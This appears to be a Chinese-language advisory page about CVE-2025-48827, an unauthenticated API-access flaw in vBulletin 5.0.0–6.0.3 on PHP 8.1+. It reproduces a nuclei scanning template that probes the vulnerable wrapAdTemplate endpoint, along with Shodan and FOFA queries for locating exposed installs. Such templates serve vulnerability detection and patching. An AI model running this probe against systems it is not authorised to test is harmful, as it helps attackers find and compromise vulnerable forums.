vBulletin 500-603 - Authentication Bypass

漏洞信息

漏洞名称: vBulletin 5.0.0-6.0.3 - Authentication Bypass

漏洞编号:

  • CVE: CVE-2025-48827

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: vBulletin是一款广泛使用的论坛软件,支持多种功能如帖子发布、用户管理等,常见于企业和个人网站中。该软件在PHP 8.1或更高版本环境下存在认证绕过漏洞,允许未认证的攻击者远程调用受保护的API控制器方法。漏洞的根源在于PHP 8.1对ReflectionMethod::invoke()等方法的内部调整,默认允许通过PHP的Reflection API调用受保护或私有的方法。这一漏洞使得攻击者能够以Web服务器用户的身份执行任意系统命令,导致系统完全被控制。攻击无需认证即可远程执行,且可自动化利用,对系统安全构成严重威胁。

产品厂商: vbulletin

产品名称: vbulletin

影响版本: 5.0.0 <= version <= 5.7.5, 6.0.0 <= version <= 6.0.3

搜索语法: app=”vBulletin”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/6f41aaeec41871233b23a1bfd1edafe97f0a1629/http%2Fcves%2F2025%2FCVE-2025-48827.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely.Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'<div class=','{{rand_string}}','{{rand_value}}','/div>')
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
vBulletin 500-603 - Authentication Bypass
http://example.com/2025/07/05/github_3289496512/
作者
lianccc
发布于
2025年7月5日
许可协议